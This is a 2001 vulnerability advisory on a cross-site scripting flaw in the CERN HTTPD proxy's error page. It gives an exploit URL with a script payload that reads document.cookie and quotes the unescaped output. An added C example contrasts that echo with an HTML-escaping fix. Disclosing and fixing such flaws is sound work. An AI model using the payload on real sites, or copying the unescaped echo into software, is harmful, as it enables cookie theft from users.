CERN Proxy Server: Cross-Site Scripting Vulnerability
=====================================================

Affected:
  CERN HTTPD 3.0A
  http://www.w3.org/Daemon/Activity.html

Vendor Status:
  CERN httpd team (httpd@w3.org) was notified on Aug 10, 2001
  but they did not respond.

Exploit:
  http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT>

========================================================
<HTML>
<HEAD>
<TITLE>Error Message</TITLE>
</HEAD>
<BODY>
<H1>Fatal Error 500</H1>
Can't Access Document: http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.
<P>
<B>Reason:</B> Can't locate remote host: nonexistenthost.google.com.
<P>
...snip...
========================================================

Similar problems have been found in Proxomitron Naoko-4 BetaFour,
Microsoft ISA Server and Squid 2.4 DEVEL4.

<http://www.securityfocus.com/bid/3087>
<http://www.microsoft.com/technet/security/bulletin/MS01-045.asp>
<http://www.securityfocus.com/archive/1/197606>

Best regards,
--
Hiromitsu Takagi
http://staff.aist.go.jp/takagi.hiromitsu/
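
The error page quoted in the advisory echoes the requested URL into HTML without escaping it. The C code below is an added example, not code from CERN httpd or from the advisory: it shows that echo next to a version that HTML-escapes the URL first. The names html_escape and render_error are hypothetical, and the page is reduced to the heading and "Can't Access Document" line.

```c
#include <stdio.h>
#include <string.h>

/* Escape HTML metacharacters from src into dst (cap bytes).
 * Returns 0 on success, -1 if dst is too small. */
int html_escape(const char *src, char *dst, size_t cap)
{
    size_t used = 0;
    if (cap == 0) return -1;
    for (; *src; src++) {
        char one[2] = { *src, '\0' };
        const char *rep = one;          /* default: copy the byte unchanged */
        switch (*src) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t n = strlen(rep);
        if (used + n + 1 > cap) return -1;  /* never emit a truncated entity */
        memcpy(dst + used, rep, n);
        used += n;
    }
    dst[used] = '\0';
    return 0;
}

/* Hypothetical stand-in for the proxy's error-page writer. escape=0 echoes
 * the URL as in the advisory's output; escape=1 is the hardened form. */
int render_error(const char *url, int escape, char *out, size_t cap)
{
    char safe[1024];
    if (escape)
        url = html_escape(url, safe, sizeof safe) == 0 ? safe : "(URL omitted)";
    int n = snprintf(out, cap,
        "<H1>Fatal Error 500</H1>\nCan't Access Document: %s.\n", url);
    return (n < 0 || (size_t)n >= cap) ? -1 : 0;
}

int main(void)
{
    /* Request URL taken from the advisory text. */
    const char *url = "http://nonexistenthost.google.com/"
                      "<SCRIPT>document.write(document.cookie)</SCRIPT>";
    char page[2048];
    if (render_error(url, 0, page, sizeof page) == 0) printf("unescaped:\n%s\n", page);
    if (render_error(url, 1, page, sizeof page) == 0) printf("escaped:\n%s\n", page);
    return 0;
}
```

In the escaped output the tag arrives as &lt;SCRIPT&gt; text, so the browser renders the URL instead of interpreting it as markup in the proxied site's origin.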